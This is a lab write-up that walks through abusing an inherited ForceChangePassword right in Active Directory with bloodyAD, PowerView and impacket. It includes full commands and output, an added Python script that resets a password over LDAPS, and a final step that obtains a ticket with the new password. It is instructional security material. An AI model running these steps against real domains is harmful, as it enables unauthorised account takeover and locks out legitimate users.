ForceChangePassword
During the BloodHound enumeration it was identified that the hazel.green user has transitive ForceChangePassword rights over the molly.smith user through its membership in the Tier2-Admins group.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hazel.green@dc.hokkaido-aerospace.com.ccache bloodyAD -d HOKKAIDO-AEROSPACE.COM -k --host dc.hokkaido-aerospace.com get writable --detail
distinguishedName: CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
pwdLastSet: WRITE
[...REDACTED...]
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hazel.green@dc.hokkaido-aerospace.com.ccache powerview HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Get-DomainObjectAcl -Identity molly.smith -SecurityIdentifier Tier2-Admins'
Logging directory is set to /home/kali/.powerview/logs/hokkaido-aerospace-dc.hokkaido-aerospace.com
[2025-04-25 18:10:18] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
ObjectDN : CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
ObjectSID : S-1-5-21-3227296914-974780204-1325941497-1107
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Force-Change-Password
InheritanceType : User
SecurityIdentifier : HOKKAIDO-AEROSPACE\Tier2-Admins
ObjectDN : CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
ObjectSID : S-1-5-21-3227296914-974780204-1325941497-1107
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Pwd-Last-Set
InheritanceType : User
SecurityIdentifier : HOKKAIDO-AEROSPACE\Tier2-Admins
ObjectDN : CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
ObjectSID : S-1-5-21-3227296914-974780204-1325941497-1107
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : User
SecurityIdentifier : HOKKAIDO-AEROSPACE\Tier2-Admins
Confirming with bloodyAD and PowerView: bloodyAD lists pwdLastSet as writable on the molly.smith object, and PowerView shows the three ACEs granted to Tier2-Admins. The one that matters is the ControlAccess ACE whose ObjectAceType is User-Force-Change-Password, the extended right to reset the password without knowing the current one; WriteProperty on Pwd-Last-Set and ReadProperty would not allow a reset on their own. All three ACEs carry INHERITED_ACE, so they are inherited from a parent OU rather than being set on molly.smith directly.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hazel.green@dc.hokkaido-aerospace.com.ccache powerview HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com --no-pass -k -ns $IP --use-ldaps --dc-ip $IP -q 'Set-DomainUserPassword -Identity molly.smith -AccountPassword qwer1234'
Logging directory is set to /home/kali/.powerview/logs/hokkaido-aerospace-dc.hokkaido-aerospace.com
[2025-04-25 18:13:29] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
[2025-04-25 18:13:29] [Set-DomainUserPassword] Principal CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com found in domain
[2025-04-25 18:13:29] [Set-DomainUserPassword] Password has been successfully changed for user Molly.Smith
[2025-04-25 18:13:29] Password changed for molly.smith
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=hazel.green@dc.hokkaido-aerospace.com.ccache bloodyAD -d HOKKAIDO-AEROSPACE.COM -k --host dc.hokkaido-aerospace.com set password molly.smith qwer1234
[+] Password changed successfully!
Using the TGT of the hazel.green user, the password of the molly.smith user is reset to qwer1234 (either tool is sufficient; the second run simply sets the same value again). This is an administrative reset, not a change: the existing password is overwritten and is not recoverable by this method, the account owner is locked out of their own credential, and the domain controller logs the reset as event 4724, so on a real engagement this step should be agreed with the client beforehand.
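The ACL interpretation and the reset above, as an added example that is not part of the original write-up or of bloodyAD/PowerView: a Python script that parses a PowerView ACE listing (the sample is constructed from the output above), decides whether a given principal holds the ForceChangePassword right on the target, and performs the same reset as an LDAP replace of unicodePwd over LDAPS using the Kerberos ticket in KRB5CCNAME. The dc_host and target_dn arguments of reset_password_ldaps are placeholders and that function needs the ldap3 and gssapi packages; the parsing and encoding helpers run offline.

```python
"""Added example: reason about ForceChangePassword ACEs and show the
LDAP operation behind a password reset. Not the write-up's own code."""
import re

# Constructed from the PowerView Get-DomainObjectAcl output in the write-up.
SAMPLE_ACL = """\
ObjectDN : CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
ObjectSID : S-1-5-21-3227296914-974780204-1325941497-1107
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ControlAccess
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : User-Force-Change-Password
InheritanceType : User
SecurityIdentifier : HOKKAIDO-AEROSPACE\\Tier2-Admins
ObjectDN : CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
ObjectSID : S-1-5-21-3227296914-974780204-1325941497-1107
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : WriteProperty
ObjectAceFlags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType : Pwd-Last-Set
InheritanceType : User
SecurityIdentifier : HOKKAIDO-AEROSPACE\\Tier2-Admins
ObjectDN : CN=Molly Smith,OU=Tier1,OU=admins,OU=it,DC=hokkaido-aerospace,DC=com
ObjectSID : S-1-5-21-3227296914-974780204-1325941497-1107
ACEType : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags : CONTAINER_INHERIT_ACE, INHERITED_ACE
AccessMask : ReadProperty
ObjectAceFlags : ACE_INHERITED_OBJECT_TYPE_PRESENT
InheritanceType : User
SecurityIdentifier : HOKKAIDO-AEROSPACE\\Tier2-Admins
"""


def parse_powerview_acl(text):
    """Split PowerView's 'Key : Value' listing into one dict per ACE.
    Every ObjectDN line starts a new ACE record."""
    aces, current = [], None
    for line in text.splitlines():
        m = re.match(r"^(\w+)\s*:\s*(.*)$", line.strip())
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "ObjectDN":
            current = {}
            aces.append(current)
        if current is not None:
            current[key] = value
    return aces


def grants_force_change_password(ace):
    """True if this one ACE carries the Reset Password extended right.
    GenericAll implies every extended right. ControlAccess with no object
    type also grants all extended rights; with an object type it grants
    only that right, so only User-Force-Change-Password counts.
    WriteProperty on Pwd-Last-Set does not permit a reset by itself."""
    if not ace.get("ACEType", "").startswith("ACCESS_ALLOWED"):
        return False
    mask = {m.strip() for m in ace.get("AccessMask", "").split(",")}
    if "GenericAll" in mask:
        return True
    if "ControlAccess" in mask:
        return ace.get("ObjectAceType", "") in ("", "User-Force-Change-Password")
    return False


def can_reset_password(aces, principal):
    """Does `principal` (with or without the DOMAIN\\ prefix) hold the right?"""
    wanted = principal.lower()
    for ace in aces:
        sid = ace.get("SecurityIdentifier", "")
        if wanted in (sid.lower(), sid.split("\\")[-1].lower()):
            if grants_force_change_password(ace):
                return True
    return False


def unicode_pwd_value(new_password):
    """AD expects unicodePwd as the new password in double quotes, UTF-16-LE.
    A single REPLACE of this value is an administrative reset (the right
    abused here); DELETE old + ADD new would be a user change needing the
    old password."""
    return f'"{new_password}"'.encode("utf-16-le")


def reset_password_ldaps(dc_host, target_dn, new_password):
    """Reset over LDAPS, authenticating with the ticket in KRB5CCNAME.
    Placeholder arguments; requires ldap3 and gssapi, not run offline."""
    import ldap3  # local import keeps the offline helpers dependency-free
    server = ldap3.Server(dc_host, port=636, use_ssl=True, get_info=ldap3.NONE)
    conn = ldap3.Connection(server, authentication=ldap3.SASL,
                            sasl_mechanism=ldap3.KERBEROS, auto_bind=True)
    ok = conn.modify(target_dn, {"unicodePwd": [(ldap3.MODIFY_REPLACE,
                                                 [unicode_pwd_value(new_password)])]})
    result, _ = conn.result, conn.unbind()
    return ok, result


if __name__ == "__main__":
    aces = parse_powerview_acl(SAMPLE_ACL)
    print(len(aces), "ACEs parsed")
    print("Tier2-Admins can reset molly.smith:",
          can_reset_password(aces, "Tier2-Admins"))
    print("unicodePwd value for qwer1234:", unicode_pwd_value("qwer1234"))
```

Run stand-alone it reports three ACEs and that Tier2-Admins can reset the password; feed it the listing for a principal that only has the Pwd-Last-Set WriteProperty ACE and it correctly answers no, which is the distinction bloodyAD's `pwdLastSet: WRITE` line alone does not make.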
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-getTGT HOKKAIDO-AEROSPACE.COM/molly.smith@dc.hokkaido-aerospace.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: qwer1234
[*] Saving ticket in molly.smith@dc.hokkaido-aerospace.com.ccache
Validated: a TGT is obtained for the molly.smith user with the new password.